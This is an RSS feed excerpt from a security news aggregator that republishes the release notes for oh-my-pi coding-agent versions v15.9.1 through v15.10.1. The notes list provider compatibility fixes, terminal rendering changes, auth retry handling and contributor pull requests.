<li>fix(mnemopi): populated memory_embeddings on remember and auto-derived queryEmbedding on recall by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4587474942" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1833" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1833/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1833">#1833</a></li>
<li>fix(ai): preserve kimi-k2.6 reasoning across tool calls by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4587940457" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1839" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1839/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1839">#1839</a></li>
<li>fix(robomp): serialize same-issue event claims by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588054083" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1841" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1841/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1841">#1841</a></li>
<li>fix(tui): list marketplace plugins in settings panel by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588163194" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1844" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1844/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1844">#1844</a></li>
<li>fix(ai): honor Anthropic cache-control compat for OpenAI-compatible providers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588252625" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1847" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1847/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1847">#1847</a></li>
<li>fix(providers): add Xiaomi Token Plan support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588308887" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1848" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1848/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1848">#1848</a></li>
<li>fix(providers): cap Kimi K2.x maxTokens on Fireworks/Fire Pass at 32,768 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588442297" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1852" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1852/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1852">#1852</a></li>
<li>fix(providers): enable append-only auto for xiaomi sgLang endpoints by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588495346" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1854" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1854/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1854">#1854</a></li>
<li>fix(mcp): update completed tool status icons by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588591896" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1856" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1856/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1856">#1856</a></li>
<li>fix(ai): drop image content for DashScope compatible-mode text-only Qwen by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588990930" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1861" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1861/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1861">#1861</a></li>
<li>fix(coding-agent): restore Exa MCP fallback by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4589028789" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1862" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1862/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1862">#1862</a></li>
<li>fix(coding-agent): keep local plan writes off ACP bridge by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4589204923" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1864" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1864/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1864">#1864</a></li>
<li>fix(utils): swallow editorconfig probe errors to keep TUI rendering safe by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4590382708" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1873" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1873/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1873">#1873</a></li>
<li>fix(utils): tolerate malformed paths in editorconfig indentation lookup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4590394502" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1874" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1874/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1874">#1874</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v15.9.0...v15.9.1"><tt>v15.9.0...v15.9.1</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v15.10.0]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Added

Added a dependency-free @oh-my-pi/pi-ai/effort module exporting the Effort enum and THINKING_EFFORTS, split out of model-thinking so hot-path consumers can import the thinking levels without pulling in model-thinking and its provider-compat dependency graph. The package bar...]]></description>
<link>https://tsecurity.de/de/3580231/tools/v15100/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580231/tools/v15100/</guid>
<pubDate>Mon, 08 Jun 2026 02:50:53 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Added a dependency-free <code>@oh-my-pi/pi-ai/effort</code> module exporting the <code>Effort</code> enum and <code>THINKING_EFFORTS</code>, split out of <code>model-thinking</code> so hot-path consumers can import the thinking levels without pulling in <code>model-thinking</code> and its provider-compat dependency graph. The package barrel still re-exports both names, so existing imports are unaffected.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>
<p>Fixed Antigravity usage provider emitting one bar per model instead of deduplicating by tier — a single account's 15+ model entries now collapse to one bar per tier, matching the shared-quota reality of the upstream API.</p>
</li>
<li>
<p>Fixed Antigravity usage reports missing <code>email</code> and <code>accountId</code> in metadata, so the <code>/usage</code> display and the deduplicator can associate reports with their credentials.</p>
</li>
<li>
<p>Fixed usage-report dedup ignoring <code>projectId</code> for Google Cloud providers, preventing duplicate credential entries from being recognized as the same account.</p>
</li>
<li>
<p>Fixed Cloud Code Assist (Antigravity / Gemini CLI) rejecting the <code>github</code> tool with HTTP 400 when the <code>pr</code> parameter schema contained <code>anyOf: [string, array]</code>. The CCA mixed-type combiner collapse picked the first non-null type (<code>string</code>) but indiscriminately copied type-specific keys from variant branches — <code>items</code> from the array variant leaked onto the string-typed result, producing <code>{type: "string", items: {...}}</code> which Google's API rejects as invalid. The collapse now filters merged variant fields against the winning type's allowed key set. (<a href="https://github.com/can1357/oh-my-pi/pull/2002" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2002/hovercard">#2002</a>)</p>
</li>
<li>
<p>Fixed OpenAI Responses-family providers (Codex, OpenAI Responses, Azure Responses) rejecting requests with <code>400 No tool output found for function call …</code> after the user branched/navigated the session tree to a node that ends on a tool call (the tool-result child is dropped from the reconstructed history) or after a turn was aborted/crashed between the call streaming and its result persisting. The converters now synthesize a placeholder <code>function_call_output</code>/<code>custom_tool_call_output</code> immediately after any unpaired <code>function_call</code>/<code>custom_tool_call</code>, symmetric to the existing orphan-output repair, so the model still sees the call and can recover instead of the whole request 400ing.</p>
</li>
<li>
<p>Fixed Anthropic-compatible reasoning endpoints losing prior-turn reasoning on continuation requests when they emit unsigned <code>thinking</code> blocks. <code>convertAnthropicMessages</code> treated unknown endpoints as signature-enforcing and demoted unsigned reasoning to <code>type: "text"</code>, which destabilized tool-call argument serialization on the next turn — the upstream symptom behind the <code>args?.ops?.map is not a function</code> crash reported against the <code>todo</code> tool. Official <code>api.anthropic.com</code> keeps the conservative text fallback; non-official <code>anthropic-messages</code> reasoning models now replay unsigned reasoning as native <code>type: "thinking"</code> (<a href="https://github.com/can1357/oh-my-pi/issues/2005" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2005/hovercard">#2005</a>).</p>
</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Replaced the <code>providers.parallelFetch</code> boolean setting with the <code>providers.fetch</code> enum (<code>auto</code> / <code>native</code> / <code>trafilatura</code> / <code>lynx</code> / <code>parallel</code> / <code>jina</code>) that selects the URL reader-backend priority for the <code>read</code>/<code>fetch</code> tool, mirroring <code>providers.image</code>/<code>providers.webSearch</code>. Existing configs are migrated automatically: the legacy key is dropped and the new <code>auto</code> default applies.</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added a GitHub Actions read handler to the <code>read</code>/web-fetch GitHub scraper. Fetching <code>github.com/{owner}/{repo}/actions/runs/{id}</code> renders the run metadata plus a per-job breakdown (steps listed for any job that did not succeed), and <code>…/actions/runs/{id}/job/{id}</code> (also the API-style <code>…/jobs/{id}</code>) renders a single job's metadata, step table, and full plain-text logs. Logs are fetched via the <code>actions/jobs/{id}/logs</code> redirect using <code>GITHUB_TOKEN</code>/<code>GH_TOKEN</code> when present, with the per-line ISO timestamp prefix and leading BOM stripped; the section degrades to an explicit notice when logs are unavailable (no token, private repo, or expired/unfinalized run).</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed eval <code>agent()</code> subagents so they are never subject to the <code>task.maxRuntimeMs</code> wall-clock cap. The parent cell's idle watchdog is already suspended for the entire bridge call (<code>withBridgeTimeoutPause</code>), so a long-running fan-out/recovery workflow must not be killed by a per-subagent runtime limit. <code>runEvalAgent</code> now passes <code>maxRuntimeMs: 0</code> to <code>runSubprocess</code>, which honors an explicit <code>ExecutorOptions.maxRuntimeMs</code> override over the inherited setting.</li>
<li>Changed interactive timing behavior so <code>PI_TIMING=x pi</code> preloads the module timer before the CLI graph loads and includes the <code>(modules)</code> report. <code>PI_TIMING=full</code> now also exits after printing, matching <code>PI_TIMING=x</code>, so full module reports are usable for cold-start measurement without launching the TUI. Added the root <code>dev:timing</code> script for the same profiled startup path.</li>
<li>Changed coding-agent startup imports so normal TUI launch imports <code>InteractiveMode</code> directly, keeps print/RPC/ACP runners on their branch-only paths, and moves marketplace auto-update work behind a lightweight deferred starter.</li>
<li>Changed cold-launch setup gating so the full setup wizard (every scene plus the overlay and their TUI/OAuth/web-search/theme dependencies) is no longer statically imported by <code>main.ts</code>. The current setup version now lives in a tiny dependency-free <code>modes/setup-version</code> module, and the wizard barrel is lazy-loaded only when the stored setup version is stale or the wizard is forced — the common up-to-date launch skips loading it entirely.</li>
<li>Changed cold-launch startup imports so the hot-path CLI files no longer pull the full <code>@oh-my-pi/pi-ai</code> barrel: <code>commands/launch.ts</code> and <code>cli/args.ts</code> import <code>THINKING_EFFORTS</code>/<code>Effort</code> from the tiny <code>@oh-my-pi/pi-ai/effort</code> module, and <code>config/model-registry.ts</code> now imports its ~20 symbols from narrow subpaths (<code>api-registry</code>, <code>model-cache</code>, <code>model-manager</code>, <code>model-thinking</code>, <code>models</code>, <code>provider-models</code>, <code>types</code>, <code>utils/event-stream</code>) instead of the barrel — so launching no longer eagerly loads every provider, auth, OAuth, and usage module re-exported by the barrel.</li>
<li>Changed the <code>read</code>/<code>fetch</code> HTML reader-backend priority to <code>native &gt; trafilatura &gt; lynx &gt; parallel &gt; jina</code> (was <code>parallel &gt; jina &gt; trafilatura &gt; lynx &gt; native</code>). The in-process native <code>htmlToMarkdown</code> runs first — instant, no network, full-fidelity — so the common case no longer depends on a remote service, and a stalled remote backend can no longer mask it. Selecting a specific backend via <code>providers.fetch</code> tries it first, then the rest fall back. The low-quality gate (<code>&gt;100</code> chars and not <code>isLowQualityOutput</code>) now applies uniformly to every backend; when none clears it, the highest-priority substantial-but-low-quality output is still surfaced so the <code>llms.txt</code> / document-extraction fallbacks keep running.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed eval <code>agent()</code> failures surfacing as an opaque <code>RuntimeError: bridge call '__agent__' failed</code> with no reason. When a subagent aborted, <code>runEvalAgent</code> built its failure message with <code>result.error ?? result.stderr ?? result.abortReason ?? …</code>, but <code>result.stderr</code> is the empty string on a clean abort (and <code>result.error</code> is gated on a non-empty <code>stderr</code>), so the nullish chain stopped at <code>""</code> and never reached <code>abortReason</code>. The empty string propagated through the loopback bridge and the Python prelude's <code>RuntimeError(msg or "bridge call … failed")</code>, discarding the real reason. The chain now uses <code>||</code> so an empty <code>stderr</code> falls through to <code>abortReason</code>.</li>
<li>Fixed subagent aborts being mislabeled as the generic "Cancelled by caller" when the abort originated inside the subagent's own turn (<code>stopReason: "aborted"</code> with no caller signal and no runtime-limit timer). <code>runSubprocess</code> now prefers the aborted assistant message's <code>errorMessage</code> (e.g. "Request was aborted" or a specific stream error) for that case, while a real caller signal or wall-clock abort still reports its precise reason.</li>
<li>Fixed a long streaming tool preview that alone overflows the viewport dropping its scrolled-off head on ED3-risk terminals (ghostty/kitty/iTerm2/…). When expanded with <code>Ctrl+O</code>, a streaming <code>write</code> (content streaming in) and a streaming <code>eval</code> (stdout streaming below its fixed code cell) render top-anchored and grow append-only, but the tool block never reported itself append-only to the transcript, so the renderer's commit-as-you-go boundary stopped at the block start and the earlier rows that scrolled above the viewport were committed nowhere — they vanished, leaving the preview looking like a viewport-tall circular buffer. <code>ToolExecutionComponent</code> now implements <code>isTranscriptBlockAppendOnly()</code> (gated on <code>isTranscriptBlockFinalized()</code>, so it also covers partial-result streams like <code>eval</code>), delegating to a renderer-declared <code>isStreamingPreviewAppendOnly</code> predicate so the expanded stream commits its head exactly like a streamed assistant reply. Collapsed previews (bounded sliding tail windows) and finalized/result previews (which can collapse to a capped view) stay deferred.</li>
<li>Fixed <code>read</code>/<code>fetch</code> silently dropping whole list sections on pages with malformed list markup — stray <code>&lt;img&gt;</code>, text, or <code>&lt;video&gt;</code> nodes as direct children of <code>&lt;ul&gt;</code> (e.g. the Alacritty changelog). The Jina reader (previously tried before the local renderers) mis-extracts such lists, returning empty <code>Added</code>/<code>Changed</code> sections; the native in-process renderer now runs first and preserves the full content.</li>
<li>Fixed <code>/usage</code> aggregate amount fallback using raw <code>limits.length</code> as account count — now counts unique <code>accountId</code> values from limit scopes, so N limits from a single account no longer display as "N accts".</li>
<li>Fixed <code>/usage</code> account labeling falling back to "account N" for providers that use <code>projectId</code> as their primary identity (e.g. Google Antigravity, Gemini CLI) — <code>projectId</code> from report metadata is now considered before the generic fallback.</li>
<li>Fixed the <code>todo</code> tool's TUI renderer crashing with <code>TypeError: args?.ops?.map is not a function</code> when a streaming tool-call delta surfaced a non-array <code>ops</code> field (mid-stream <code>parseStreamingJson</code> shapes like <code>{ ops: "[{" }</code>, or <code>[null]</code> entries before fields arrive). The renderer now treats non-array <code>ops</code>, non-object entries, and non-array <code>items</code> as missing structure instead of crashing, which also stops the spam-warn cascade that followed each malformed delta. Paired with the Anthropic-side reasoning-replay fix in <code>packages/ai</code> (<a href="https://github.com/can1357/oh-my-pi/issues/2005" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2005/hovercard">#2005</a>).</li>
<li>Fixed Python eval <code>agent()</code> collapsing subagent runtime-limit aborts (and other empty-stderr aborts) into a generic <code>RuntimeError: bridge call '__agent__' failed</code>. <code>runEvalAgent</code> coalesced the failure message with <code>??</code>, which stopped at the empty <code>stderr</code> and never reached <code>abortReason</code>, shipping an empty error through the loopback bridge. The bridge now prefers <code>abortReason</code> for aborts and trims empty <code>stderr</code>/<code>error</code> out of the fallback chain, so Python surfaces the actionable reason (e.g. <code>Subagent runtime limit exceeded (task.maxRuntimeMs=900000)</code>) (<a href="https://github.com/can1357/oh-my-pi/issues/2006" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2006/hovercard">#2006</a>).</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Changed</h3>
<ul>
<li>Reworked the DEC 2026 synchronized-output default policy: a positive DECRQM mode-2026 report now <strong>enables</strong> sync (previously a report could only disable it), so conservatively defaulted-off hosts that actually support it — current Zellij, tmux master, foot, contour, mintty — are upgraded at runtime. The static allowlist also covers Alacritty and the VS Code terminal, honors a <code>TERM_FEATURES</code> <code>Sy</code> advertisement and <code>WT_SESSION</code> (Windows Terminal / WSL), and no longer blanket-disables SSH (DEC 2026 passes through to the outer terminal). Risky multiplexers still start off and rely on the probe. Added <code>synchronizedOutputUserOverride()</code> as the shared opt-out/force resolver.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed WSL/Windows Terminal row flicker while typing by repainting changed text rows before clearing only their stale suffix (<a href="https://github.com/can1357/oh-my-pi/issues/2011" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2011/hovercard">#2011</a>).</li>
<li>Fixed terminals that support DEC 2026 still tearing/flickering because the renderer ignored a positive DECRQM capability report and kept synchronized output off — most visibly WSL + Windows Terminal, Alacritty (≥0.13), and the VS Code terminal (≥1.108), which were detected yet refused sync.</li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Changed</h3>
<ul>
<li><code>logger.printTimings()</code> (the <code>PI_TIMING</code> startup tree) now surfaces two previously-invisible regions: a <code>(before instrumentation)</code> line for runtime init / uncaptured pre-marker work, and an <code>(unattributed self)</code> line for the root span's own untimed work so the gap between visible top-level spans and <code>Total</code> is no longer swallowed. <code>Total</code> is now labelled <code>(since first marker)</code> to make the window explicit. The restored <code>module-timer.ts</code> preload can feed module spans into the report: each module records <code>onLoad</code> → final top-level marker as <code>total</code>, a prepended body marker → final marker as <code>body/TLA</code>, and resolved static imports as a bounded dependency tree so the report separates graph wait from actual top-level module work.</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(ai): strip type-specific keys when CCA mixed-type collapse picks non-matching type by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/basedcorp99/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/basedcorp99">@basedcorp99</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4604403802" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2002" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2002/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2002">#2002</a></li>
<li>fix(usage): sanitize Antigravity /usage display — dedupe by tier, fix account count, merge window data by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/basedcorp99/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/basedcorp99">@basedcorp99</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4604535282" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2004" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2004/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2004">#2004</a></li>
<li>fix(coding-agent): harden todo renderer against malformed streaming args by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4604606095" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2007" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2007/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2007">#2007</a></li>
<li>fix(eval): surface subagent abort reason through Python agent() bridge by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4604617408" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2008" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2008/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2008">#2008</a></li>
<li>docs(web-search): updated kagi description to v1 endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4604730736" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2010" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2010/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2010">#2010</a></li>
<li>fix(tui): reduce WSL row flicker while typing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4605011322" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2012" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2012/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2012">#2012</a></li>
<li>fix(debug): wait for dlv unix socket before connecting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4605183307" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2014" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2014/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2014">#2014</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v15.9.69...v15.10.0"><tt>v15.9.69...v15.10.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v15.10.1]]></title>
<description><![CDATA[@oh-my-pi/pi-agent-core
Added

Added optional promptCacheKey support to AgentOptions and Agent via a new promptCacheKey property so providers can receive a caller-provided prompt cache key
Added optional ApiKeyResolveContext parameter to getApiKey in AgentOptions and AgentLoopConfig so key resolv...]]></description>
<link>https://tsecurity.de/de/3580230/tools/v15101/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580230/tools/v15101/</guid>
<pubDate>Mon, 08 Jun 2026 02:50:51 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-agent-core</h2>
<h3>Added</h3>
<ul>
<li>Added optional <code>promptCacheKey</code> support to <code>AgentOptions</code> and <code>Agent</code> via a new <code>promptCacheKey</code> property so providers can receive a caller-provided prompt cache key</li>
<li>Added optional <code>ApiKeyResolveContext</code> parameter to <code>getApiKey</code> in <code>AgentOptions</code> and <code>AgentLoopConfig</code> so key resolvers can receive retry context</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Enabled streaming API calls to re-resolve credentials through the <code>getApiKey</code> callback when retries occur after authentication-related errors</li>
<li><code>Agent.abort(reason?)</code> now forwards <code>reason</code> to the underlying <code>AbortController</code>, and the synthesized aborted assistant message carries that reason on <code>errorMessage</code> (string or non-<code>AbortError</code> <code>Error</code> message) instead of always defaulting to <code>"Request was aborted"</code>. Bare <code>abort()</code> is unchanged.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed handling of short-lived API keys so that expired tokens are retried with a refreshed value during 401/usage-limit failures</li>
<li>Ensured fallback API key resolution uses the initially configured static <code>apiKey</code> when <code>getApiKey</code> is present</li>
<li>Wrapped oneshot LLM completions (<code>instrumentedCompleteSimple</code>: handoff, compaction/branch summaries) in an <code>EventLoopKeepalive</code>. These run outside the agent <code>#runLoop</code>, so without the keepalive Bun's event loop stopped servicing timers while parked on the completion promise — freezing host spinners (e.g. the <code>/handoff</code> loader) until an unrelated terminal resize poked the loop into rendering again.</li>
</ul>
<h2>@oh-my-pi/pi-ai</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Removed the <code>onAuthError</code> option from stream request options and shifted auth retry handling to resolver-based <code>apiKey</code> behavior, requiring callers using custom auth-retry hooks to migrate</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added <code>ApiKeyResolver</code> and <code>ApiKey</code> auth helpers, including <code>isApiKeyResolver</code>, <code>isAuthRetryableError</code>, <code>resolveApiKeyOnce</code>, and <code>withAuth</code>, and exported them from the package root</li>
<li>Added support for a function-valued <code>apiKey</code> in <code>SimpleStreamOptions</code> so a single stream request can refresh or rotate credentials during retry</li>
<li>Added <code>forceRefresh</code> credential option to <code>AuthStorage.getApiKey</code> and <code>rotateSessionCredential</code> support for session-level credential rotation after auth failures</li>
<li>Added <code>AuthStorage.resolver(provider, options)</code> method that builds an <code>ApiKeyResolver</code> implementing the a/b/c auth-retry policy directly on the storage instance</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed gateway and stream auth flows to share the a/b/c retry policy, refreshing the same session credential first and then switching to a sibling credential on repeated auth failures</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed streaming auth retries to handle <code>401</code> and usage-limit errors before replay-unsafe content is emitted, including failures surfaced only via <code>errorStatus</code></li>
<li>Fixed tool argument validation to coerce singleton non-string values into arrays when the schema expects an array, preventing Anthropic-compatible models that emit <code>todo.ops</code> as an object from getting stuck in repeated validation-error loops. (<a href="https://github.com/can1357/oh-my-pi/issues/2026" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2026/hovercard">#2026</a>)</li>
<li>Fixed streaming retries to buffer and suppress partial <code>start</code> events from failed auth attempts so only clean retried events are delivered</li>
<li>Fixed the HTTP 400 raw-request dumper (<code>appendRawHttpRequestDumpFor400</code>) littering the real <code>~/.omp/logs/http-400-requests</code> directory during tests. Provider suites exercise the 400 error path with mocked <code>fetch</code> responses, which the dumper could not distinguish from genuine failures; it now skips persistence under the Bun test runner (<code>isBunTestRuntime()</code>).</li>
